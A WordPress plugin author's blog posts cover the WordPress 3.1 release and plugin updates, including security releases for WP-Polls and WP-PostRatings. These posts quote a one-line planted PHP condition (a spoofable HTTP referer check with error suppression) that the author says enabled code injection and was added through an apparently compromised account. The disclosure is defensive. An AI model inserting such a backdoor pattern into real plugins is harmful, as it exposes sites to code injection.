WordPress 3.1 is finally out! With regards to my plugins compatibility with WordPress 3.1, I have not had the chance to test it it. I will be doing it soon =)
The long-awaited fourteenth release of WordPress is now available. WordPress 3.1 “Django” is named in honor of the jazz guitarist Django Reinhardt. Version 3.1 is available for download, or you can update from within your dashboard.
This release features a lightning fast redesigned linking workflow which makes it easy to link to your existing posts and pages, an admin bar so you’re never more than a click away from your most-used dashboard pages, a streamlined writing interface that hides many of the seldom-used panels by default to create a simpler and less intimidating writing experience for new bloggers (visit Screen Options in the top right to get old panels back), and a refreshed blue admin scheme available for selection under your personal options.
There’s a bucket of candy for developers as well, including our new Post Formats support which makes it easy for themes to create portable tumblelogs with different styling for different types of posts, new CMS capabilities like archive pages for custom content types, a new Network Admin, an overhaul of the import and export system, and the ability to perform advanced taxonomy and custom fields queries.
With the 3.1 release, WordPress is more of a CMS than ever before. The only limit to what you can build is your imagination.
(No video yet for 3.1, we’re going to add it later.)
By the Numbers
There were over two thousand commits to the codebase in the 3.1 cycle! For a more comprehensive look at everything that has improved in 3.1, check out 3.1’s Codex page or the more than 820 closed issues in Trac.
Now is the time to drop by our development channels if you are interested in being involved with 3.2, as the agenda will be under discussion shortly. We’re hoping to get the 3.2 release out in a shorter development cycle (3.1 took too long) and include some fun improvements around plugins and the speed of the admin. (Don’t worry, we’re still planning on using PHP.)
We’re All in This Together
WordPress is the result of the combined effort of people from all over the world united with a common goal: to make the best darn web software for publishing your story on the web and sharing it with the world. There are more than 180 people who helped out with development during the 3.1 cycle
Download: WordPress 3.1
WP-PostViews 1.60 is released which fixes form submit issues on WPMU installation, and now there is a “Views” column on the Edit Posts page. Of course similar to WP-Polls and WP-PostRatings, I have updated readme.txt to be a proper readme now.
Download: WP-PostViews 1.60
I have release 2 security updates to WP-Polls and WP-PostRatings which basically removes a malicious code that allows code injection.
The malicious code is as follows:
if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
The code itself does nothing, but hackers are spoofing the
$_SERVER['HTTP_REFERER'] that allows arbitrary code injection and note the @ sign which surpress all errors and hence the error will not be displayed.
I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.
- Personally, I have no idea what
links_add_base_url() does and hence it is impossible for me to place it in my own plugin code.
- I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
- The above changeset is for trunk. However in my readme.txt, I have state that the stable tag is 1.50 and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and it is almost 9am on my timezone and I will be in my office and my office’s computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file
- If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.
- For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.
- For WP-WAP, there is almost 2 suspicious commit, here and here. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it
I am going to review all my commits to the SVN to ensure that there are no more suspicious code being added.
I have released WP-PostRatings 1.61 which fixes a code injection via “HTTP Referrer” and affects users who are on WP-PostRatings 1.50 only. This is the same code injection fixed for WP-Polls few days back.
I have checked the rest of my plugins to ensure that the code is not in anymore of my plugins. Sorry for any inconvenienced cased.
Similar to WP-Polls, I also took this chance to port the readme.html to the proper readme.txt which WordPress.org is using and now you can see all the details of WP-PostRatings right from the plugins page itself regardless if it is from your WP-Admin or WordPress.org.
All users should upgrade now
Props to Dion Hulse aka dd32 for the report!
Download: WP-PostRatings 1.61
I have released WP-Polls 2.61 which fixes a code injection via “HTTP Referrer” and affects users who are on WP-Polls 2.60 only.
I also took this chance to port the readme.html to the proper readme.txt which WordPress.org is using and now you can see all the details of WP-Polls right from the plugins page itself regardless if it is from your WP-Admin or WordPress.org.
All users should upgrade now
Vulnerability discovered by + Props to:
Dweeks, Leon Juranic and Chad Lavoie of the Swiftwill Security Team (www.swiftwill.com)
Download: WP-Polls 2.61